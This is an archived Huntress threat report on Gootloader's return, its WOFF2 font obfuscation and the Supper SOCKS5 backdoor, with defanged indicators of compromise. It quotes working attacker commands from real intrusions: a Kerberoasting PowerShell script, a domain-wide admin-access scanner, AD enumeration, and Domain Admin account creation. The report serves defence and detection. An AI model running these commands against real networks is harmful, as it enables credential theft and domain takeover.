{
	"id": "e599e57b-ed19-4ecf-8bad-00b8637d8dd0",
	"created_at": "2026-04-06T00:22:16.12903Z",
	"updated_at": "2026-04-10T03:34:18.745521Z",
	"deleted_at": null,
	"sha1_hash": "6d02007f968ea3c1ab3da669fb501bb7645f835a",
	"title": "Gootloader | Threat Detection Overview | Huntress",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4783250,
	"plain_text": "Gootloader | Threat Detection Overview | Huntress\r\nArchived: 2026-04-05 19:34:43 UTC\r\nGootloader is a sophisticated JavaScript-based malware loader that threat actors commonly use to gain initial access. This\r\nmalware is typically delivered when users visit compromised websites, with threat actors leveraging SEO poisoning to drive\r\ntraffic to these sites. The loader uses heavily obfuscated JavaScript payloads to facilitate additional payload delivery and has\r\nbeen active since 2020. After a period of reduced activity, Gootloader operations briefly resurged in March 2025 before\r\ngoing quiet again, only to return recently with renewed activity. Gootloader is known to be used by the threat actor tracked\r\nas Storm-0494 by MSTIC. Storm-0494 then grants access from Gootloader infections to Vanilla Tempest (previously tracked\r\nas DEV-0832). Vanilla Tempest has been active since 2022 and delivers different ransomware families, including Rhysida\r\n(commonly observed in Gootloader post-intrusion activity), BlackCat, Zeppelin, and Quantum Locker.\r\nSince October 27, Huntress has observed three Gootloader infections, including two that led to hands-on-keyboard\r\nintrusions with domain controller compromise occurring within 17 hours of initial infection.\r\nKey takeaways\r\nGootloader is back and now leveraging custom WOFF2 fonts with glyph substitution to obfuscate filenames\r\nExploits WordPress comment endpoints to deliver XOR-encrypted ZIP payloads with unique keys per file\r\nMoved from scheduled tasks to Startup folder persistence mechanism and still using Windows 8.3 short filenames\r\nSupper SOCKS5 Backdoor—Vanilla Tempest's Tool of Choice contains extensive obfuscation: API hammering,\r\nruntime shellcode construction, API hashing, and custom 2-byte LZMA compression\r\nReconnaissance begins within 20 minutes of initial infection, with Domain Controller compromise achieved in as\r\nlittle as 17 hours through predictable attack 
patterns: AD enumeration (Kerberoasting, SPN scanning), lateral\r\nmovement via WinRM, Domain Admin account creation, and potential ransomware preparation (Volume Shadow\r\nCopy enumeration)\r\nFrom @DFIRReport's observations, lateral movement to the Domain Controller happened within one hour following\r\ninitial JavaScript execution\r\nHow did it happen?\r\nThe user was searching for “missouri cover utility easement roadway” via Bing and visited the first page that showed up in\r\nthe results.\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 1 of 23\n\nFigure 1: Compromised site serving Gootloader payload\r\nThe loader abuses WordPress's comment submission endpoint (/wp-comments-post.php) to deliver encrypted payloads.\r\nWhen a user clicks \"Download\" next to one of the five available payloads, the malicious JavaScript sends a POST request to\r\n/wp-comments-post.php with the parameter comment_post_ID={document_id}. The user sees a convincing pop-up\r\ndisplaying a download progress indicator (shown in Figure 2 below), while the site serves an XOR-encrypted ZIP archive.\r\nThe XOR decryption key is hardcoded within the page's source code and corresponds to the filename with extension of the\r\nselected payload (e.g., Missouri_Utility_Easement_Guide_2023.pdf). 
Each of the five payloads uses a unique XOR key\r\nbased on its respective filename.\r\nFigure 2: Gootloader infection chain\r\nFigure 3: File download pop-up window\r\nThe XOR decryption code:\r\nfunction bc(e,t){\r\n    const n=new TextEncoder().encode(t), // t is the XOR key\r\n        a=new Uint8Array(e), // e holds the encrypted ZIP archive (ArrayBuffer)\r\n        r=new Uint8Array(a.length);\r\n    for(let l=0;l\u003ca.length;l++)\r\n        r[l]=a[l]^n[l%n.length]; // XOR each byte with key (repeating)\r\n    return r.buffer\r\n}\r\nOne of the interesting observations is that Gootloader is using a custom web font to obfuscate the filenames. So, when the\r\nuser attempts to copy the filename or inspect the source code, they will see weird characters like ‛›μI€vSO₽*'Oaμ==€\r\n‚‚33O%33‚€×:O[TM€v3cwv,. However, when rendered in the victim's browser, these same characters magically transform\r\ninto perfectly readable text like Florida_HOA_Committee_Meeting_Guide.pdf. This is achieved through a custom WOFF2\r\nfont file that Gootloader embeds directly into the JavaScript code of the page using Z85 encoding, a Base85 variant that\r\nencodes the 32KB font into a 40K string.\r\nRather than using OpenType substitution features or character mapping tables, the loader swaps what each glyph actually\r\ndisplays. The font's metadata appears completely legitimate—the character “O” maps to a glyph named \"O\", the character\r\n“a” maps to a glyph named \"a\", and so forth. 
However, the actual vector paths that define these glyphs have been swapped.\r\nWhen the browser requests the shape for glyph \"O\", the font provides the vector coordinates that draw the letter \"F\" instead.\r\nSimilarly, \"a\" draws \"l\", \"9\" draws \"o\", and special Unicode characters like \"±\" draw \"i\". The gibberish string Oa9Z±h• in\r\nthe source code renders as \"Florida\" on screen.\r\nThis technique defeats static analysis methods. String searches for keywords like \"invoice\" or \"contract\" return nothing\r\nbecause those words don't exist in the source code.\r\nFigure 4: Readable filename display vs. actual source code characters\r\nThis JavaScript file masquerades as jQuery v3.0.0 while embedding heavily obfuscated malicious code in lots of noisy\r\nstring fragments; small helper functions slice and reassemble those fragments using index math and backward loops, then\r\nrun predictable, reversible string transforms (unescape/replace, reorder/reverse fragments, small char-map or byte-shift\r\nfixes, and index math) to rebuild a second-stage JavaScript blob.\r\nFigure 5: Snippet of the JavaScript file containing the malicious code\r\nWhile the script provided by Mandiant did not successfully extract the domains, through deobfuscation of the multi-layered\r\npayload, we were able to produce a readable second-stage PowerShell script and extract all ten C2 domains (Figure 5). An\r\ninitial VBScript wrapper within the script performs execution environment detection by checking whether it's running under\r\nwscript.exe or cscript.exe via the WScript.FullName property. 
When executed under wscript.exe (the default for double-clicked VBScript files), the wrapper creates a WScript.Shell object and uses the Exec() method to launch PowerShell with\r\nthe command \"powershell \u0026 powershell\" (Back in 2022, Gootloader launched PowerShell with command “pOWErsHELl”).\r\nWhile the ampersand operator (\u0026) chains two commands, only the first PowerShell instance actually receives and executes\r\nthe commands described below.\r\nThe script exfiltrates all environment variables whose values are 99 characters or fewer, captured via (Get-ChildItem\r\nenv:*).Where({$_.value -match \"^.{0,99}$\"}). This 99-character limit appears designed to avoid extremely long PATH\r\nvariables while still capturing sensitive data like USERNAME, COMPUTERNAME, and APPDATA. The operating system\r\ncaption is then appended using Get-CimInstance Win32_OperatingSystem.\r\nBeyond environment variables, the script enumerates all running processes and specifically looks for processes with visible\r\nGUI windows. To extract window titles, it converts each process object to CSV format using ConvertTo-Csv, then parses the\r\n26th field, which corresponds to the MainWindowTitle property in PowerShell's Process object serialization. This reveals\r\nwhat the user is actively working on—open documents, websites, applications, potentially exposing sensitive document\r\nnames or credentials visible in window titles. The script also uses the Shell.Application COM object to enumerate desktop\r\nfiles, classifying each as a link, folder, or file, and inventories all mounted drives with more than 50KB free space to identify\r\nviable storage locations for staging additional payloads.\r\nThe collected data undergoes multi-stage encoding where each reconnaissance output is independently compressed using\r\nGZipStream, then wrapped with custom binary markers, a 6-byte header [235,154,216,67,95,5] and 6-byte footer\r\n[5,135,37,102,109,114], before Base64 encoding. 
These markers help the C2 server identify and validate the data format.\r\nEach beacon randomly selects one domain from 10 using Get-Random. The beaconing mechanism leverages an infinite loop\r\nwith a 20-second beacon interval via System.Threading.AutoResetEvent, where the loop condition ensures execution never\r\nterminates. Upon successful C2 communication, the script executes received PowerShell commands.\r\nFigure 6: Cleaned-up second-stage JS script\r\nApproximately 10-20 minutes after the initial JavaScript file executes, two persistence mechanisms are created\r\nusing the Startup folder (T1547.001). Gootloader previously used scheduled tasks for persistence.\r\nIn one of the cases we observed, the shortcut files were named molecular ecology.lnk and outreach services.lnk. The shortcut\r\nfiles would launch two additional shortcut files dropped under the %AppData% folder. In our case, these were\r\nC:\\Users\\username\\AppData\\Roaming\\ISIS Drivers\\Outreach Services.lnk and\r\nC:\\Users\\username\\AppData\\Roaming\\PFU\\Molecular Ecology.lnk. The latter shortcut files would be responsible for\r\nlaunching JavaScript files under the same folder where the shortcuts reside (%AppData%\\\u003cfolder_name\u003e): EMC\r\nControlCenter.js and Adaptive Algorithms.js. The shortcut files reference their targets using Windows 8.3 short filenames\r\n(e.g., MOLECU1.LNK instead of Molecular Ecology.lnk, EMCCON1.JS instead of EMC ControlCenter.js). Windows\r\nautomatically generates these short filename aliases for compatibility with legacy systems: when a file with a long name is\r\ncreated, Windows creates an 8-character alias using the first six characters plus ~1 and a three-character extension. Similar\r\nshort filename references were also observed in previous Gootloader infections since 2022. 
The two additional JavaScript\r\nfiles are similar in capabilities to the initial one but they contain different domains (please see “Indicators of Compromise”\r\nsection). It's worth noting that the shortcut files have hotkey combinations (in cases we observed, it’s \"CTRL+ALT+M\" and\r\n“CONTROL+ALT+G”) assigned to them, which allow the loader to execute upon the user pressing these specific key\r\ncombinations.\r\nFigure 7: Overview of the shortcut file using LECmd tool\r\nBefore diving into the hands-on-keyboard activity we observed, let's look at one of the favorite tools in Vanilla Tempest's\r\narsenal, the Supper backdoor.\r\nSupper backdoor: Vanilla Tempest's favorite dish\r\nA look into the obfuscation\r\nSupper SOCKS5 backdoor is commonly used by Vanilla Tempest. The backdoor has remote control capabilities over\r\ncompromised hosts and facilitates the tunneling of network traffic. This version of Supper is particularly interesting,\r\nspecifically the obfuscation part.\r\nThe backdoor is leveraging API hammering by making numerous rapid API calls, likely to frustrate analysts and complicate\r\nmanual analysis. This technique floods disassemblers and debuggers with repetitive, benign API calls that must be stepped\r\nthrough or skipped over, making the analysis process tedious and time-consuming. 
The excessive API activity also obscures\r\nthe control flow and makes it harder to identify which API calls are actually significant to the malware's core functionality\r\nversus which are just noise, forcing analysts to spend more time distinguishing meaningful behavior from deliberate\r\nobfuscation.\r\nFigure 8: Code with API hammering (on the left), code containing the shellcode with API hammering removed (on the right)\r\nWhat appears to be data assignments in the decompiled pseudocode are actually shellcode instructions being written directly\r\ninto memory at runtime. Each (_QWORD) or (_BYTE) assignment is constructing x86-64 assembly instructions byte-by-byte. For example, the 64-bit value 0x042454890824548B written to memory contains the bytes that form actual instructions;\r\nwhen the processor reads this memory location, it interprets these bytes as “mov rbx, qword ptr [rsp+8]” followed by “mov\r\nrdx, qword ptr [rsp+10]”. Once these instruction bytes are written to memory, the code marks that memory region as\r\nexecutable (using VirtualProtect with PAGE_EXECUTE permissions) and transfers control flow to it, causing the backdoor\r\nto execute the shellcode. The reconstructed shellcode contains the LZMA decompression routine for the final payload.\r\nFigure 9: The reconstructed code containing the LZMA decompression routine\r\nAs mentioned above, the final payload is LZMA-compressed. The implementation uses standard LZMA1 compression with\r\na custom header format. Instead of the standard 13-byte LZMA header (1 byte properties + 4 bytes dictionary size + 8 bytes\r\nuncompressed size), the backdoor uses only a 2-byte custom header. Byte 0 (0x1A) contains position alignment information,\r\nand byte 1 (0x03) contains literal context bits; both parameters configure how the LZMA algorithm decodes the compressed\r\ndata. 
The dictionary size (8MB, the maximum lookback window LZMA uses to find repeated data sequences during\r\ndecompression) and uncompressed size (260,270 bytes) are hardcoded directly into the assembly code rather than being\r\nstored in the header.\r\nThe obfuscated backdoor also leverages API hashing to obfuscate the API calls. The backdoor uses a simple multiplicative\r\nhash algorithm to obfuscate API function names, where each character in the function name string is processed sequentially\r\nby multiplying the running hash by 9 and adding the character's ASCII value.\r\nAPI hashing algorithm:\r\ndef calc_hash(name):\r\n    hash_value = 0\r\n    for char in name:\r\n        hash_value = (hash_value * 9 + ord(char)) \u0026 0xFFFFFFFF  # hash = (hash * 9) + byte, truncated to 32 bits\r\n    return hash_value\r\nThe backdoor uses hash-based DLL resolution by comparing precomputed hash values (such as 0xA20DF064 for\r\nADVAPI32.dll or 0x4465E058 for KERNEL32.dll) to determine which DLL to load. Once a hash match is found, the\r\nfunction reconstructs the corresponding DLL name string in memory and passes it to RtlInitUnicodeString to convert it into\r\na UNICODE_STRING structure, which is the required format for the low-level functions LdrGetDllHandle and LdrLoadDll\r\nthat the backdoor uses instead of LoadLibraryA. The backdoor deliberately uses these native ntdll.dll functions instead of\r\nhigher-level APIs like LoadLibraryA to bypass user-mode hooks commonly placed by security tools and sandboxes, which\r\ntypically monitor the more frequently used kernel32 API calls. 
The backdoor first attempts to get an existing DLL handle\r\nwith LdrGetDllHandle, falling back to LdrLoadDll if the handle lookup fails.\r\nFigure 10: Comparing precomputed hashes to the DLL names\r\nThe APIs and DLLs resolved:\r\nADVAPI32.dll\r\nKERNEL32.dll\r\nmsvcrt.dll\r\nNETAPI32.dll\r\nWS2_32.dll\r\nNtdll.dll\r\nLdrGetDllHandle\r\nRtlInitUnicodeString\r\nLdrLoadDll\r\nOpenProcessToken\r\nLoadLibraryA\r\nGetProcAddress\r\nVirtualProtect\r\nexit\r\nNetApiBufferFree\r\nrecv\r\nNtProtectVirtualMemory\r\nNtAllocateVirtualMemory\r\nRight before the shellcode execution, invalid memory protection constants (0x16 and 0x06) were passed to\r\nNtProtectVirtualMemory, which causes all three protection change calls to fail with\r\nSTATUS_INVALID_PAGE_PROTECTION since these values don't correspond to any valid Windows PAGE_* constants.\r\nThis error went unnoticed because the shellcode still executes successfully: the allocated memory region already has\r\nPAGE_EXECUTE_READWRITE (0x40) permissions from the initial NtAllocateVirtualMemory call, which provides the\r\nexecutable permissions the reconstructed code needs and makes the subsequent protection changes unnecessary.\r\nFurther hunting with the Yara rule revealed additional samples using the same obfuscation. 
These samples are attributed to\r\nOysterLoader (also known as CleanUpLoader or Broomstick), another backdoor that Vanilla Tempest refuses to quit using.\r\nWe named the obfuscator \"TextShell\".\r\nSupper's backdoor menu\r\nThe Supper backdoor communicates with its C2 servers over TCP port 443; the C2 IPs are hardcoded in the binary (please\r\nsee “Indicators of Compromise” section). The backdoor implements a custom stream cipher to encrypt and decrypt traffic.\r\nThe encryption function encrypts outbound data by generating a random key, while the decryption function handles inbound\r\ncommands using a key extracted from the message header. Both use the same XOR algorithm.\r\nWhen the backdoor needs to encrypt data to send to the C2 server, it generates a fresh 4-byte key for every message and\r\nplaces it directly in the message header.\r\nEach message begins with a 12-byte header:\r\nThe encryption key is randomly generated for each message and transmitted in the header. As mentioned above, the\r\nencryption and decryption use the same stateful XOR cipher:\r\nstate = key[0]; // Initialize with first key byte\r\nfor (i = 0; i \u003c length; i++)\r\n{\r\n    state = i + (state * 2); // Evolve based on position\r\n    data[i] ^= state ^ key[i \u0026 3]; // XOR with state and cycling key\r\n}\r\nThe cipher uses an internal counter (called \"state\") that changes as it encrypts each byte. Because the state evolves at each\r\nposition, the same plaintext byte encrypts differently depending on where it appears in the message. When the backdoor\r\nreceives encrypted data from the C2 server, it extracts the key from bytes 8-11 of the header and runs the same algorithm to\r\ndecrypt the data.\r\nThe mysterious file under %TEMP% folder\r\nThe backdoor receives configuration updates from the C2 server through message type 6 commands (see the command table\r\nbelow). 
When this message arrives, the backdoor decrypts the payload using the key from the message header. The payload\r\ncontains backup C2 server IP addresses. Rather than storing these IPs in plaintext, the backdoor encrypts them with a newly\r\ngenerated key and writes the encrypted values to a file (we observed the files named s01bafg and orl under %TEMP%\r\nfolder). This persistence mechanism ensures the backdoor maintains an updated list of fallback servers even if the primary\r\nC2 becomes unreachable.\r\nBelow is the command table for the backdoor:\r\nID | Purpose | Description\r\n0 | SOCKS5 Setup | Establishes SOCKS5 proxy server on infected host. Handles authentication negotiation and creates threads for proxied connections.\r\n1 | SOCKS Disconnect | Manages SOCKS connections. Magic value 0x6661696C (\"fail\") disconnects target. Otherwise forwards data through an active tunnel.\r\n2 | Shell Execution | Interactive cmd.exe shell. First call creates process with stdin/stdout pipes. Subsequent calls send commands and return output.\r\n3 | Self-Delete | Closes C2 connection, spawns “cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 \u003e Nul \u0026 Del /f /q \"\u003cpath\u003e\"”, then immediately exits. The ping creates a 3-second delay before deletion executes, giving the backdoor time to terminate.\r\n4 | Unused | \r\n5 | Terminate | Complete shutdown. Closes all connections, sleeps 2 seconds, performs cleanup, then exits backdoor process.\r\n6 | Update Config | Receives backup C2 IP addresses, encrypts them, writes to temp/s01bafg file.\r\n7 | Set C2 Address | Updates current C2 server IP. Formats as dotted decimal, stores in global variable.\r\nNow, you are probably wondering why we did a full technical write-up on the Supper backdoor. We think it's crucial to be\r\nable to understand the tool's capabilities and see why it's being leveraged by the threat actors—mainly for its simplicity and\r\nreliability. There's nothing groundbreaking here; it's basic SOCKS proxying and a simple shell. But that's exactly the point.\r\nThreat actors don't need sophisticated zero-days when bread-and-butter tools like this get the job done. Understanding the\r\nmundane gives defenders a reality check: most breaches aren't Hollywood-level sophisticated, they are just well-executed\r\nbasics that fly under the radar if the host is not being properly monitored by an endpoint solution.\r\nWhen Gootloader brings friends\r\nCase #1\r\nApproximately 20 minutes after the initial JavaScript execution, the threat actor performed reconnaissance from one of the\r\nFOUR dropped Supper SOCKS5 backdoors. Why the threat actor decided to drop four instances of a Supper backdoor is\r\nstill a mystery.\r\nThe example of the backdoor execution:\r\nC:\\Users\\username\\AppData\\Local\\Zoxsimio\\Failover Dependency.exe\" ./FAILOV~1.ULB ,DllRegisterServer. 
\r\nThe following reconnaissance commands were executed from the backdoor:\r\nnet user \u003cusername\u003e /domain\r\nnltest /dclist:\r\nnet group \"domain admins\" /domain\r\nnltest /domain_trusts\r\nSome additional interesting reconnaissance commands were executed:\r\nThis command searches Active Directory (AD) for user accounts with Service Principal Names (SPNs):\r\npowershell.exe -command \"$search = New-Object DirectoryServices.DirectorySearcher([ADSI]''); $search.Filter =\r\n'(\u0026(servicePrincipalName=*)(objectCategory=user))'; $results = $search.FindAll(); foreach ($result in $results) { $u\r\n= $result.GetDirectoryEntry(); Write-Host $u.name, $u.samaccountname; foreach ($s in $u.servicePrincipalName) {\r\nWrite-Host $s; } Write-Host '---'; }\"\r\nThis command scans all domain computers to find where the current user has local admin access:\r\npowershell.exe -ExecutionPolicy bypass -Command \"$UBcPGBjR99=\r\n{param($vars);$nZzkzLTK99=$vars.computer;$Error.clear();Get-WmiObject -Class Win32_OperatingSystem -\r\nComputerName $nZzkzLTK99 -ErrorAction SilentlyContinue;$SBUXiYcH99=$error[0];$out='';if($SBUXiYcH99 -\r\neq $null){$out='Local Admin access on: $nZzkzLTK99';}elseif(-not\r\n$SBUXiYcH99.Exception.Message.Contains(\\\"Access is denied.\\\")){}else{}$out;};$YSUPVCAn99=New-Object\r\nSystem.DirectoryServices.DirectorySearcher;$YSUPVCAn99.SearchRoot=New-Object\r\nSystem.DirectoryServices.DirectoryEntry;$YSUPVCAn99.Filter='(\u0026\r\n(sAMAccountType=805306369))';$zcGEXXZD99=$YSUPVCAn99.FindAll()|%{$_.properties.dnshostname};$rsp=\r\n[runspacefactory]::CreateRunspacePool(1,100);$rsp.CleanupInterval=New-TimeSpan -Seconds\r\n10;$rsp.open();$jobs=New-Object System.Collections.ArrayList;$i=0;while($i -lt $zcGEXXZD99.Count)\r\n{$nZzkzLTK99=$zcGEXXZD99[$i];if($rsp.GetAvailableRunspaces() -gt 
0){$vars=\r\n[PSCustomObject]@{'computer'=$nZzkzLTK99};$PS3=\r\n[PowerShell]::Create();$PS3.AddScript($UBcPGBjR99).AddArgument($vars)|Out-Null;$PS3.RunspacePool=$rsp;$jobs+=\r\n[PSCustomObject]@{Pipe=$PS3;Status=$PS3.BeginInvoke()};$i++;}else{Sleep -Milliseconds\r\n500;}}while($jobs.Status.IsCompleted -notcontains $true){Sleep -Milliseconds 500;}foreach($job in $jobs){Write-Host $($job.Pipe.EndInvoke($job.Status));$job.Pipe.Dispose();}$rsp.Close();$rsp.Dispose();\"\r\nThis command performs a Kerberoasting attack to extract crackable password hashes:\r\npowershell.exe -ExecutionPolicy bypass -Command \"$Null =\r\n[Reflection.Assembly]::LoadWithPartialName('System.IdentityModel'); $search = New-Object\r\nDirectoryServices.DirectorySearcher([ADSI]''); $search.filter = '(\u0026(servicePrincipalName=*)\r\n(objectCategory=user))'; $results = $search.Findall(); foreach ($results in $results) { $u =\r\n$results.GetDirectoryEntry(); $samAccountName = $u.samAccountName; foreach ($s in $u.servicePrincipalName)\r\n{ $Ticket = $null; try { $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -\r\nArgumentList $s; } catch [System.Management.Automation.MethodInvocationException] {} if ($Ticket -ne $null) {\r\n$TicketByteStream = $Ticket.GetRequest(); if ($TicketByteStream) { $TicketHexStream =\r\n[System.BitConverter]::ToString($TicketByteStream) -replace '-'; [System.Collections.ArrayList]$Parts =\r\n($TicketHexStream -replace '^(.*?)04820...(.*)', '$2') -Split 'A48201'; $Parts.RemoveAt($Parts.Count - 1); $Hash =\r\n$Parts -join 'A48201'; try { $Hash = $Hash.Insert(32, '$'); $HashFormat = '$krb5tgs$23$*' + $samAccountName + '/'\r\n+ $s + '*$' + $Hash; Write-Host $HashFormat; break; } catch\r\n[System.Management.Automation.MethodInvocationException] {} } } } }\"\r\nApproximately 16 hours and 54 minutes after the initial JavaScript execution and reconnaissance activity, the threat actor\r\nmoved laterally via WinRM (Windows Remote Management) to the 
Domain Controller. On the Domain Controller, the\r\nthreat actor created a user sccmad and added it to the Domain Admins and local Administrators groups, then enumerated\r\ncurrently logged-on users on the system to verify that the newly created user exists via the following commands:\r\nnet USER sccmad \u003credacted password\u003e /ADD\r\nnet group \\\"Domain Admins\\\" sccmad /ADD /DOMAIN\r\nnet LOCALGROUP administrators sccmad /add\r\nquser.exe\r\nThe threat actor then leveraged Impacket to remotely execute the following command on the Domain Controller:\r\ncmd.exe /Q /c echo C:\\Windows\\system32\\cmd.exe /C vssadmin list shadows /for=C: ^\u003e\r\nC:\\Windows\\Temp\\__output \u003e C:\\Windows\\TEMP\\execute.bat \u0026 C:\\Windows\\system32\\cmd.exe /Q /c\r\nC:\\Windows\\TEMP\\execute.bat \u0026 del C:\\Windows\\TEMP\\execute.bat\r\nImpacket automatically wrapped this command in its standard batch file execution pattern, creating a temporary file named\r\nexecute.bat under the C:\\Windows\\TEMP\\ folder, running the vssadmin command to enumerate Volume Shadow Copy\r\nsnapshots, redirecting the output, and then deleting the batch file to remove artifacts. This allowed the threat actor to identify\r\nwhat backup snapshots existed on the system, typically as a precursor to deleting them before deploying ransomware.\r\nCase #2\r\nIn another case, we observed the threat actor running the following reconnaissance commands from the dropped Supper\r\nbackdoor approximately 20 minutes after the initial JavaScript execution:\r\nThis command searches AD for all user accounts that have text in their description field, then displays the username\r\nand description. Administrators sometimes store sensitive information in user description fields, such as temporary\r\npasswords, account purposes, or privileged account notes. 
It's a quick way to find potentially valuable information\r\nthat may have been carelessly documented in AD:\r\npowershell -Command \"$searcher = [adsisearcher]'(\u0026(objectCategory=user)(description=*))';\r\n$searcher.PropertiesToLoad.Add('samaccountname'); $searcher.PropertiesToLoad.Add('description'); $results =\r\n$searcher.FindAll(); foreach ($result in $results) { $result.Properties['samaccountname'][0] + ' - ' +\r\n$result.Properties['description'][0] }\"\r\nThis command enumerates all Windows Server machines in the AD domain, displaying their hostname, DNS name,\r\noperating system version, and last logon timestamp. It helps threat actors identify high-value targets like domain\r\ncontrollers, file servers, or application servers. The count at the end gives them the total number of servers in the\r\nenvironment, which helps assess the scope of the network:\r\npowershell -NoProfile -Command \"Write-Host '===== SERVERS ====='; try { $s=New-Object\r\nDirectoryServices.DirectorySearcher; $s.Filter='(objectCategory=Computer)';\r\n'name','dnshostname','operatingsystem','lastlogontimestamp'|%{$s.PropertiesToLoad.Add($_)}; $s.PageSize=5000;\r\n$c=0; $s.FindAll()|%{ if($_.Properties['operatingsystem'] -match 'Windows Server') { $n=$_.Properties['name'];\r\n$d=$_.Properties['dnshostname']; $o=$_.Properties['operatingsystem']; $l=if($_.Properties['lastlogontimestamp']) {\r\n[datetime]::FromFileTime($_.Properties['lastlogontimestamp'][0]) } else { 'N/A' }; Write-Host \\\"$n, $d, $o, $l\\\";\r\n$c++ } }; Write-Host \\\"nCount of all Windows Servers: $c\\\" } catch { Write-Host \\\"nError:\r\n$($_.Exception.Message)\\\" }\"\r\nCase #3\r\nWe observed the threat actor create the user bpadmin and add it to the Remote Desktop Users group on the beachhead host\r\nusing net group \"Remote Desktop Users\" bpadmin /add. 
Subsequently, the threat actor leveraged their existing Domain\r\nAdmin privileges to perform a DCSync attack.\r\nThe plot thickens…\r\n@DFIRReport kindly shared with us observations from their environment, where the following activity occurred:\r\nThe ZIP file exhibits conditional behavior based on the extraction method. When opened with a tool like 7-Zip, it\r\ndrops the malicious JavaScript file disguised as a .txt file. However, when extracted using the default Windows ZIP\r\nutility, it directly drops the JavaScript file in executable form.\r\nThe threat actor achieved lateral movement to a domain controller in under one hour following the initial Gootloader\r\ninfection, which is significantly faster than the 17-hour timeframe observed in Case #1.\r\nOnce access to the domain controller was gained, the threat actor deployed a malicious proxy DLL and established\r\npersistence via a scheduled task running with SYSTEM privileges. 
Analysis of the DLL revealed embedded\r\nshellcode referencing a project named MEOWBACKCONN.\r\nFollowing persistence establishment, the threat actor used ntdsutil to dump the NTDS.dit database (T1003.003), then\r\ncompressed it into a ZIP archive, likely staged for exfiltration.\r\nThe threat actor performed cleanup activities following their operations, including clearing event logs and deleting\r\nregistry keys related to Terminal Server client connections (T1070.001).\r\nConclusion\r\nGootloader has returned with some changes, most notably its use of custom WOFF2 fonts that perform glyph substitution by\r\ntransforming gibberish characters in source code into legitimate-looking filenames when rendered in browsers.\r\nThe infection operates through a well-established criminal partnership: Storm-0494 handles Gootloader operations and\r\ninitial access, then hands off compromised environments to Vanilla Tempest for post-exploitation and ransomware\r\ndeployment. This division of work has proven effective since 2020, with Vanilla Tempest consistently deploying various\r\nransomware families, particularly Rhysida.\r\nThe Supper SOCKS5 backdoor uses tedious obfuscation protecting simple functionality—API hammering, runtime\r\nshellcode construction, and custom encryption add analysis headaches, but the core capabilities remain deliberately basic:\r\nSOCKS proxying and remote shell access. This \"good enough\" approach proves that threat actors don't need cutting-edge\r\nexploits when properly obfuscated bread-and-butter tools achieve their objectives.\r\nWhat did we learn from this?\r\nThreat actors move fast—reconnaissance within 20 minutes, Domain Controller compromise within 17 hours. Organizations\r\nhave an extremely narrow detection and response window before attackers establish Domain Admin access and begin\r\nransomware preparation. 
Despite sophisticated initial obfuscation, threat actors follow repeatable patterns: AD enumeration\r\n(Kerberoasting, SPN scanning), domain-wide local admin scanning, lateral movement via WinRM, privileged account\r\ncreation, and Volume Shadow Copy enumeration. These behaviors are detectable with proper monitoring. Most breaches\r\nsucceed through well-executed basic techniques, not zero-days. Monitor for unusual PowerShell execution, AD enumeration\r\npatterns, privilege escalation attempts, and lateral movement. These \"mundane\" activities are your earliest warning signs.\r\nWhile Gootloader enhances its evasion capabilities, the attack patterns that follow remain consistent. \r\nThe map of the infection chain (Case #1)\r\nFigure 11: Gootloader infection chain\r\nDetections\r\nYara\r\nSupper backdoor\r\nIndicators of Compromise\r\nItem Description\r\nSHA256:\r\ncf44aa11a17b3dad61cae715f4ea27c0cbf80732a1a7a1c530a5c9d3d183482a\r\nC2s:\r\n103.253.42[.]91\r\n91.236.230[.]134\r\n213.232.236[.]138\r\n146.19.49[.]177\r\nTextShell containing Supper Backdoor: Failover Dependency Zoxsimio.ulb\r\nPath:\r\nC:\\Users\\username\\AppData\\Roaming\\ISIS Drivers\\\r\nSHA256:\r\n39d980851be1e111c035e4db2589fa3d5f59a5bef7b7b3e36bff5435c78f7049\r\nDomains:\r\nhxxps://cortinaspraga.com/\r\nhxxp://cookcountyjudges.org/\r\nhxxps://x.fybw.org/\r\nhxxps://jungutah.com/\r\nhxxps://influenceimmo.com/\r\nhxxps://tokyocheapo.com/\r\nhxxps://espressonisten.de/\r\nhxxps://tiresdoc.com/\r\nhxxps://hotporntv.net/\r\nhxxps://yourboxspring.nl/\r\nGootloader’s secondary JavaScript file: 
EMC ControlCenter.js\r\nPath:\r\nC:\\Users\\username\\AppData\\Roaming\\Nuance\\\r\nSHA256:\r\nb9a61652dffd2ab3ec3b7e95829759fc43665c27e9642d4b2d4d2f7287254034\r\nDomains:\r\nhxxps://filmcrewnepal.com/\r\nhxxps://yoga-penzberg.de/\r\nhxxps://sugarbeecrafts.com/\r\nhxxps://www.worldwealthbuilders.com/\r\nhxxps://lepolice.com/\r\nhxxps://www.lovestu.com/\r\nhxxps://bluehamham.com/\r\nhxxps://vps3nter.ir/\r\nhxxps://whiskymuseum.at/\r\nhxxps://latimp.eu/\r\nGootloader’s secondary JavaScript file:\r\nMitigation Strategies.js\r\nPath: \r\nC:\\Users\\username\\AppData\\Roaming\\PFU\\\r\nSHA256:\r\n2f056ce0657542da3e7e43fb815a8973c354624043f19ef134dff271db1741b3\r\nDomains:\r\nhxxps://solidegypt.net/\r\nhxxps://wessper.com/\r\nhxxps://www.pathfindertravels.se/tickets/\r\nhxxps://www.smithcoinc.biz/\r\nhxxps://kollabmi.se/\r\nhxxps://xxxmorritas.com/\r\nhxxps://onsk.dk/\r\nhxxps://villasaze.ir/\r\nhxxps://blossomthemesdemo.com/\r\nhxxps://headedforspace.com/\r\nGootloader’s secondary JavaScript file: Adaptive Algorithms.js\r\nSHA256:\r\nc2326db8acae0cf9c5fc734e01d6f6c1cd78473b27044955c5761ec7fd479964\r\nGootloader’s initial JavaScript file:\r\nDomestic_Partnership_Agreement_Template.js\r\nSHA256:\r\nad88076fd75d80e963d07f03d7ae35d4e55bd49634baf92743eece19ec901e94\r\nGootloader’s initial JavaScript file:\r\nUnmarried_Couples_Rights_Checklist.js\r\nPath: C:\\Users\\username\\AppData\\Local\\Oardwior\\\r\nSHA256:\r\ncf44aa11a17b3dad61cae715f4ea27c0cbf80732a1a7a1c530a5c9d3d183482a\r\nC2s:\r\n178.32.224[.]219\r\n37.59.205[.]2\r\n193.104.58[.]64\r\nTextShell containing Supper Backdoor:\r\nDisconnect Package 